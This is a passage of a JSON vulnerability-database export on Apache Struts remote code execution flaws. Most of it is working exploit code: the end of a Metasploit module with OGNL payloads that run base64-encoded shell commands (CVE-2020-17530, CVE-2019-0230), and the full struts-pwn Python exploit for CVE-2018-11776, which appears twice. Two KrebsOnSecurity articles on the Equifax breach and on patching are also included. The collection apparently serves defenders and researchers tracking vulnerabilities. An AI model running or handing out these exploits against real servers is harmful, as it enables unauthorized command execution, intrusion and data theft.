)\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']])\n ])\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])\n ])\n end\n\n def check\n num1 = rand(1000..9999)\n num2 = rand(1000..9999)\n\n res = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\"))\n if res.nil?\n return CheckCode::Unknown\n elsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty?\n return CheckCode::Safe\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n cve = datastore['CVE']\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\")\n\n if cve == 'CVE-2019-0230'\n ognl = []\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']'\n ognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)'\n ognl << '#ognlUtil.setExcludedClasses(\\'\\')'\n ognl << '#ognlUtil.setExcludedPackageNames(\\'\\')'\n res = send_request_cgi(build_http_request(cve, ognl))\n fail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200\n end\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded, { cve: cve })\n when :linux_dropper\n execute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 })\n end\n end\n\n def execute_command(cmd, opts = {})\n send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)\n end\n\n def build_http_request(cve, ognl)\n ognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array\n\n http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }\n http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?\n if cve == 'CVE-2019-0230'\n http_request_parameters['method'] = 'GET'\n http_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n elsif cve == 'CVE-2020-17530'\n http_request_parameters['method'] = 'POST'\n http_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n end\n http_request_parameters\n end\n\n def build_ognl(cve, cmd)\n cmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ognl = []\n if cve == 'CVE-2019-0230'\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)'\n ognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\"\n elsif cve == 'CVE-2020-17530'\n ognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]'\n ognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]'\n ognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")'\n ognl << '#bean.setBean(#stack)'\n ognl << '#context=#bean.get(\"context\")'\n ognl << '#bean.setBean(#context)'\n ognl << '#macc=#bean.get(\"memberAccess\")'\n ognl << '#bean.setBean(#macc)'\n ognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")'\n ognl << '#bean.put(\"excludedClasses\",#emptyset)'\n ognl << '#bean.put(\"excludedPackageNames\",#emptyset)'\n ognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")'\n ognl << \"#execute.exec({\\\"#{cmd}\\\"})\"\n end\n\n ognl\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_multi_eval_ognl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-26T00:00:00", "type": "exploitpack", "title": "Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-26T00:00:00", "id": "EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "href": "", "sourceData": "#!/usr/bin/env python3\n# coding=utf-8\n# *****************************************************\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\n# Author:\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\n# This code uses a payload from:\n# https://github.com/jas502n/St2-057\n# *****************************************************\n\nimport argparse\nimport random\nimport requests\nimport sys\ntry:\n from urllib import parse as urlparse\nexcept ImportError:\n import urlparse\n\n# Disable SSL warnings\ntry:\n import requests.packages.urllib3\n requests.packages.urllib3.disable_warnings()\nexcept Exception:\n pass\n\nif len(sys.argv) <= 1:\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\n print('[*] Struts-PWN - @mazen160')\n print('\\n%s -h for help.' % (sys.argv[0]))\n exit(0)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-u\", \"--url\",\n dest=\"url\",\n help=\"Check a single URL.\",\n action='store')\nparser.add_argument(\"-l\", \"--list\",\n dest=\"usedlist\",\n help=\"Check a list of URLs.\",\n action='store')\nparser.add_argument(\"-c\", \"--cmd\",\n dest=\"cmd\",\n help=\"Command to execute. (Default: 'id')\",\n action='store',\n default='id')\nparser.add_argument(\"--exploit\",\n dest=\"do_exploit\",\n help=\"Exploit.\",\n action='store_true')\n\n\nargs = parser.parse_args()\nurl = args.url if args.url else None\nusedlist = args.usedlist if args.usedlist else None\ncmd = args.cmd if args.cmd else None\ndo_exploit = args.do_exploit if args.do_exploit else None\n\nheaders = {\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Accept': '*/*'\n}\ntimeout = 3\n\n\ndef parse_url(url):\n \"\"\"\n Parses the URL.\n \"\"\"\n\n # url: http://example.com/demo/struts2-showcase/index.action\n\n url = url.replace('#', '%23')\n url = url.replace(' ', '%20')\n\n if ('://' not in url):\n url = str(\"http://\") + str(url)\n scheme = urlparse.urlparse(url).scheme\n\n # Site: http://example.com\n site = scheme + '://' + urlparse.urlparse(url).netloc\n\n # FilePath: /demo/struts2-showcase/index.action\n file_path = urlparse.urlparse(url).path\n if (file_path == ''):\n file_path = '/'\n\n # Filename: index.action\n try:\n filename = url.split('/')[-1]\n except IndexError:\n filename = ''\n\n # File Dir: /demo/struts2-showcase/\n file_dir = file_path.rstrip(filename)\n if (file_dir == ''):\n file_dir = '/'\n\n return({\"site\": site,\n \"file_dir\": file_dir,\n \"filename\": filename})\n\n\ndef build_injection_inputs(url):\n \"\"\"\n Builds injection inputs for the check.\n \"\"\"\n\n parsed_url = parse_url(url)\n injection_inputs = []\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\n\n try:\n url_directories.remove(\"\")\n except ValueError:\n pass\n\n for i in range(len(url_directories)):\n injection_entry = \"/\".join(url_directories[:i])\n\n if not injection_entry.startswith(\"/\"):\n injection_entry = \"/%s\" % (injection_entry)\n\n if not injection_entry.endswith(\"/\"):\n injection_entry = \"%s/\" % (injection_entry)\n\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\n injection_entry += parsed_url[\"filename\"]\n\n injection_inputs.append(injection_entry)\n\n return(injection_inputs)\n\n\ndef check(url):\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\n multiplication_value = random_value * random_value\n injection_points = build_injection_inputs(url)\n parsed_url = parse_url(url)\n print(\"[%] Checking for CVE-2018-11776\")\n print(\"[*] URL: %s\" % (url))\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\n attempts_counter = 0\n\n for injection_point in injection_points:\n attempts_counter += 1\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\n try:\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\n except Exception as e:\n print(\"EXCEPTION::::--> \" + str(e))\n continue\n if \"Location\" in resp.headers.keys():\n if str(multiplication_value) in resp.headers['Location']:\n print(\"[*] Status: Vulnerable!\")\n return(injection_point)\n print(\"[*] Status: Not Affected.\")\n return(None)\n\n\ndef exploit(url, cmd):\n parsed_url = parse_url(url)\n\n injection_point = check(url)\n if injection_point is None:\n print(\"[%] Target is not vulnerable.\")\n return(0)\n print(\"[%] Exploiting...\")\n\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\n\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\n\n try:\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\n except Exception as e:\n print(\"EXCEPTION::::--> \" + str(e))\n return(1)\n\n print(\"[%] Response:\")\n print(resp.text)\n return(0)\n\n\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\n if url:\n if not do_exploit:\n check(url)\n else:\n exploit(url, cmd)\n\n if usedlist:\n URLs_List = []\n try:\n f_file = open(str(usedlist), \"r\")\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\n try:\n URLs_List.remove(\"\")\n except ValueError:\n pass\n f_file.close()\n except Exception as e:\n print(\"Error: There was an error in reading list file.\")\n print(\"Exception: \" + str(e))\n exit(1)\n for url in URLs_List:\n if not do_exploit:\n check(url)\n else:\n exploit(url, cmd)\n\n print(\"[%] Done.\")\n\n\nif __name__ == \"__main__\":\n try:\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\n except KeyboardInterrupt:\n print(\"\\nKeyboardInterrupt Detected.\")\n print(\"Exiting...\")\n exit(0)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2018-08-23T21:31:12", "description": "In September 2017, **Equifax** disclosed that a failure to patch one of its Internet servers against a pervasive software flaw -- in a Web component known as **Apache Struts** -- led to a breach that [exposed personal data on 147 million Americans](<https://krebsonsecurity.com/2017/09/the-equifax-breach-what-you-should-know/>). Now security experts are warning that blueprints showing malicious hackers how to exploit a newly-discovered Apache Struts bug are available online, leaving countless organizations in a rush to apply new updates and plug the security hole before attackers can use it to wriggle inside.\n\n\n\nOn Aug. 22, the **Apache Software Foundation** released software updates to fix [a critical vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts, a Web application platform used by an estimated 65 percent of Fortune 100 companies. Unfortunately, computer code that can be used to exploit the bug has since been posted online, meaning bad guys now have precise instructions on how to break into vulnerable, unpatched servers.\n\nAttackers can exploit a Web site running the vulnerable Apache Struts installation using nothing more than a Web browser. The bad guy simply needs to send the right request to the site and the Web server will run any command of the attacker's choosing. At that point, the intruder could take any number of actions, such as adding or deleting files, or copying internal databases.\n\nAn [alert](<https://semmle.com/news/apache-struts-CVE-2018-11776>) about the Apache security update was posted Wednesday by **Semmle**, the San Francisco software company whose researchers discovered the bug.\n\n\"The widespread use of Struts by leading enterprises, along with the proven potential impact of this sort of vulnerability, illustrate the threat that this vulnerability poses,\" the alert warns.\n\n\"Critical remote code execution vulnerabilities like the one that affected Equifax and the one we announced today are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" wrote Semmle co-founder **Pavel Avgustinov**. \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\"\n\nThe timeline in the 2017 Equifax breach highlights how quickly attackers can take advantage of Struts flaws. On March 7, 2017, Apache released a patch for a similarly dangerous Struts flaw, and within 24 hours of that update security experts began tracking signs that attackers were exploiting vulnerable servers.\n\nJust three days after the patch was released, attackers found Equifax's servers were vulnerable to the Apache Struts flaw, and used the vulnerability as an initial entry point into the credit bureau's network.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2018/08/equifaxhack.png>)\n\nA slide from \"We are all Equifax,\" an RSA talk given in April 2018 by Derek Weeks.\n\nThe vulnerability affects all supported versions of Struts 2. Users of Struts _2.3_ should upgrade to version _2.3.35;_ users of Struts _2.5_ should upgrade to _2.5.17_.\n\nMore technical details about this bug from its discoverer, **Man Yue Mo**, are [here](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>). The Apache Software Foundation's advisory is [here](<https://cwiki.apache.org/confluence/display/WW/S2-057>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T20:22:35", "type": "krebs", "title": "Experts Urge Rapid Patching of \u2018Struts\u2019 Bug", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T20:22:35", "id": "KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6", "href": "https://krebsonsecurity.com/2018/08/experts-urge-rapid-patching-of-struts-bug/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-17T17:56:36", "description": "**Visa** and **MasterCard** are sending confidential alerts to financial institutions across the United States this week, warning them about more than 200,000 credit cards that were stolen in the epic data breach announced last week at big-three credit bureau **Equifax**. At first glance, the private notices obtained by KrebsOnSecurity appear to suggest that hackers initially breached Equifax starting in November 2016. But Equifax says the accounts were all stolen at the same time -- when hackers accessed the company's systems in mid-May 2017.\n\n\n\nBoth Visa and MasterCard frequently send alerts to card-issuing financial institutions with information about specific credit and debit cards that may have been compromised in a recent breach. But it is unusual for these alerts to state from which company the accounts were thought to have been pilfered.\n\nIn this case, however, Visa and MasterCard were unambiguous, referring to Equifax specifically as the source of an e-commerce card breach.\n\nIn a non-public alert sent this week to sources at multiple banks, Visa said the \"window of exposure\" for the cards stolen in the Equifax breach was between Nov. 10, 2016 and July 6, 2017. A similar alert from MasterCard included the same date range.\n\n\"The investigation is ongoing and this information may be amended as new details arise,\" Visa said in its confidential alert, linking to the press release Equifax initially posted about the breach on Sept. 7, 2017.\n\nThe card giant said the data elements stolen included card account number, expiration date, and the cardholder's name. Fraudsters can use this information to conduct e-commerce fraud at online merchants.\n\nIt would be tempting to conclude from these alerts that the card breach at Equifax dates back to November 2016, and that perhaps the intruders then managed to install software capable of capturing customer credit card data in real-time as it was entered on one of Equifax's Web sites.\n\nIndeed, that was my initial hunch in deciding to report out this story. But according to a statement from Equifax, the hacker(s) downloaded the data in one fell swoop in mid-May 2017.\n\n\u201cThe attacker accessed a storage table that contained historical credit card transaction related information,\" the company said. \"The dates that you provided in your e-mail appear to be the transaction dates. We have found no evidence during our investigation to indicate the presence of card harvesting malware, or access to the table before mid-May 2017.\u201d\n\nEquifax did not respond to questions about how it was storing credit card data, or why only card data collected from customers after November 2016 was stolen.\n\nIn its [initial breach disclosure](<https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628>) on Sept. 7, Equifax said it discovered the intrusion on July 29, 2017. The company said the hackers broke in through a vulnerability in the software that powers some of its Web-facing applications.\n\nIn [an update to its breach disclosure](<https://www.equifaxsecurity2017.com/>) published Wednesday evening, Equifax confirmed reports that the application flaw in question was a weakness disclosed in March 2017 in a popular open-source software package called **Apache Struts **([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>))**. **\n\n\"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted,\" the company wrote. \"We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nThe Apache flaw was [first spotted around March 7, 2017](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), when security firms began warning that attackers were actively exploiting a \"zero-day\" vulnerability in Apache Struts. Zero-days refer to software or hardware flaws that hackers find and figure out how to use for commercial or personal gain before the vendor even knows about the bugs.\n\nBy March 8, Apache had released new versions of the software to mitigate the vulnerability. But by that time exploit code that would allow anyone to take advantage of the flaw was already published online -- making it a race between companies needing to patch their Web servers and hackers trying to exploit the hole before it was closed.\n\nScreen shots apparently taken on March 10, 2017 and later posted to the vulnerability tracking site xss[dot]cx indicate that the Apache Struts vulnerability [was present at the time on annualcreditreport.com](<http://xss.cx/2017/03/12/txt/cve-2017-5638-annualcreditreportcom-exploit-poc-content-type-http-header-example.html>) -- the only web site mandated by Congress where all Americans can go to obtain a free copy of their credit reports from each of the three major bureaus annually.\n\nIn [another screen shot](<http://xss.cx/2017/03/12/txt/cve-2017-5638-consumerexperianin-exploit-poc-content-type-http-header-example.html>) apparently made that same day and uploaded to xss[dot]cx, we can see evidence that the Apache Struts flaw also was present in Experian's Web properties.\n\nEquifax has said the unauthorized access occurred from mid-May through July 2017, suggesting either that the company's Web applications were still unpatched in mid-May or that the attackers broke in earlier but did not immediately abuse their access.\n\nIt remains unclear when exactly Equifax managed to fully eliminate the Apache Struts flaw from their various Web server applications. But one thing we do know for sure: The hacker(s) got in before Equifax closed the hole, and their presence wasn't discovered until July 29, 2017.\n\n**Update, Sept. 15, 12:31 p.m. ET:** Visa has updated their advisory about these 200,000+ credit cards stolen in the Equifax breach. Visa now says it believes the records also included the cardholder's Social Security number and address, suggesting that (ironically enough) the accounts were stolen from people who were signing up for credit monitoring services through Equifax.\n\nEquifax also clarified the breach timeline to note that it patched the Apache Struts flaw in its Web applications only after taking the hacked system(s) offline on July 30, 2017. Which means Equifax left its systems unpatched for more than four months after a patch (and exploit code to attack the flaw) was publicly available.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-14T18:03:12", "title": "Equifax Hackers Stole 200k Credit Card Accounts in One Fell Swoop", "type": "krebs", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-14T18:03:12", "href": "https://krebsonsecurity.com/2017/09/equifax-hackers-stole-200k-credit-card-accounts-in-one-fell-swoop/", "id": "KREBS:EE70929DE902D9B233E209B73C1AD4A0", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2018-08-27T17:58:42", "description": "", "cvss3": {}, "published": "2018-08-26T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.3 / 2.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-26T00:00:00", "id": "PACKETSTORM:149086", "href": "https://packetstormsecurity.com/files/149086/Apache-Struts-2.3-2.5-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \n# coding=utf-8 \n# ***************************************************** \n# struts-pwn: Apache Struts CVE-2018-11776 Exploit \n# Author: \n# Mazin Ahmed <Mazin AT MazinAhmed DOT net> \n# This code uses a payload from: \n# https://github.com/jas502n/St2-057 \n# ***************************************************** \n \nimport argparse \nimport random \nimport requests \nimport sys \ntry: \nfrom urllib import parse as urlparse \nexcept ImportError: \nimport urlparse \n \n# Disable SSL warnings \ntry: \nimport requests.packages.urllib3 \nrequests.packages.urllib3.disable_warnings() \nexcept Exception: \npass \n \nif len(sys.argv) <= 1: \nprint('[*] CVE: 2018-11776 - Apache Struts2 S2-057') \nprint('[*] Struts-PWN - @mazen160') \nprint('\\n%s -h for help.' % (sys.argv[0])) \nexit(0) \n \n \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \"--url\", \ndest=\"url\", \nhelp=\"Check a single URL.\", \naction='store') \nparser.add_argument(\"-l\", \"--list\", \ndest=\"usedlist\", \nhelp=\"Check a list of URLs.\", \naction='store') \nparser.add_argument(\"-c\", \"--cmd\", \ndest=\"cmd\", \nhelp=\"Command to execute. (Default: 'id')\", \naction='store', \ndefault='id') \nparser.add_argument(\"--exploit\", \ndest=\"do_exploit\", \nhelp=\"Exploit.\", \naction='store_true') \n \n \nargs = parser.parse_args() \nurl = args.url if args.url else None \nusedlist = args.usedlist if args.usedlist else None \ncmd = args.cmd if args.cmd else None \ndo_exploit = args.do_exploit if args.do_exploit else None \n \nheaders = { \n'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', \n# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', \n'Accept': '*/*' \n} \ntimeout = 3 \n \n \ndef parse_url(url): \n\"\"\" \nParses the URL. \n\"\"\" \n \n# url: http://example.com/demo/struts2-showcase/index.action \n \nurl = url.replace('#', '%23') \nurl = url.replace(' ', '%20') \n \nif ('://' not in url): \nurl = str(\"http://\") + str(url) \nscheme = urlparse.urlparse(url).scheme \n \n# Site: http://example.com \nsite = scheme + '://' + urlparse.urlparse(url).netloc \n \n# FilePath: /demo/struts2-showcase/index.action \nfile_path = urlparse.urlparse(url).path \nif (file_path == ''): \nfile_path = '/' \n \n# Filename: index.action \ntry: \nfilename = url.split('/')[-1] \nexcept IndexError: \nfilename = '' \n \n# File Dir: /demo/struts2-showcase/ \nfile_dir = file_path.rstrip(filename) \nif (file_dir == ''): \nfile_dir = '/' \n \nreturn({\"site\": site, \n\"file_dir\": file_dir, \n\"filename\": filename}) \n \n \ndef build_injection_inputs(url): \n\"\"\" \nBuilds injection inputs for the check. \n\"\"\" \n \nparsed_url = parse_url(url) \ninjection_inputs = [] \nurl_directories = parsed_url[\"file_dir\"].split(\"/\") \n \ntry: \nurl_directories.remove(\"\") \nexcept ValueError: \npass \n \nfor i in range(len(url_directories)): \ninjection_entry = \"/\".join(url_directories[:i]) \n \nif not injection_entry.startswith(\"/\"): \ninjection_entry = \"/%s\" % (injection_entry) \n \nif not injection_entry.endswith(\"/\"): \ninjection_entry = \"%s/\" % (injection_entry) \n \ninjection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload. \ninjection_entry += parsed_url[\"filename\"] \n \ninjection_inputs.append(injection_entry) \n \nreturn(injection_inputs) \n \n \ndef check(url): \nrandom_value = int(''.join(random.choice('0123456789') for i in range(2))) \nmultiplication_value = random_value * random_value \ninjection_points = build_injection_inputs(url) \nparsed_url = parse_url(url) \nprint(\"[%] Checking for CVE-2018-11776\") \nprint(\"[*] URL: %s\" % (url)) \nprint(\"[*] Total of Attempts: (%s)\" % (len(injection_points))) \nattempts_counter = 0 \n \nfor injection_point in injection_points: \nattempts_counter += 1 \nprint(\"[%s/%s]\" % (attempts_counter, len(injection_points))) \ntesting_url = \"%s%s\" % (parsed_url[\"site\"], injection_point) \ntesting_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value)) \ntry: \nresp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) \nexcept Exception as e: \nprint(\"EXCEPTION::::--> \" + str(e)) \ncontinue \nif \"Location\" in resp.headers.keys(): \nif str(multiplication_value) in resp.headers['Location']: \nprint(\"[*] Status: Vulnerable!\") \nreturn(injection_point) \nprint(\"[*] Status: Not Affected.\") \nreturn(None) \n \n \ndef exploit(url, cmd): \nparsed_url = parse_url(url) \n \ninjection_point = check(url) \nif injection_point is None: \nprint(\"[%] Target is not vulnerable.\") \nreturn(0) \nprint(\"[%] Exploiting...\") \n \npayload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd) \n \ntesting_url = \"%s%s\" % (parsed_url[\"site\"], injection_point) \ntesting_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload) \n \ntry: \nresp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) \nexcept Exception as e: \nprint(\"EXCEPTION::::--> \" + str(e)) \nreturn(1) \n \nprint(\"[%] Response:\") \nprint(resp.text) \nreturn(0) \n \n \ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): \nif url: \nif not do_exploit: \ncheck(url) \nelse: \nexploit(url, cmd) \n \nif usedlist: \nURLs_List = [] \ntry: \nf_file = open(str(usedlist), \"r\") \nURLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\") \ntry: \nURLs_List.remove(\"\") \nexcept ValueError: \npass \nf_file.close() \nexcept Exception as e: \nprint(\"Error: There was an error in reading list file.\") \nprint(\"Exception: \" + str(e)) \nexit(1) \nfor url in URLs_List: \nif not do_exploit: \ncheck(url) \nelse: \nexploit(url, cmd) \n \nprint(\"[%] Done.\") \n \n \nif __name__ == \"__main__\": \ntry: \nmain(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) \nexcept KeyboardInterrupt: \nprint(\"\\nKeyboardInterrupt Detected.\") \nprint(\"Exiting...\") \nexit(0) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149086/apachestruts2325-exec.txt"}, {"lastseen": "2018-08-27T17:58:42", "description": "", "cvss3": {}, "published": "2018-08-25T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.3 / 2.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-25T00:00:00", "id": "PACKETSTORM:149087", "href": "https://packetstormsecurity.com/files/149087/Apache-Struts-2.3-2.5-Remote-Code-Execution.html", "sourceData": 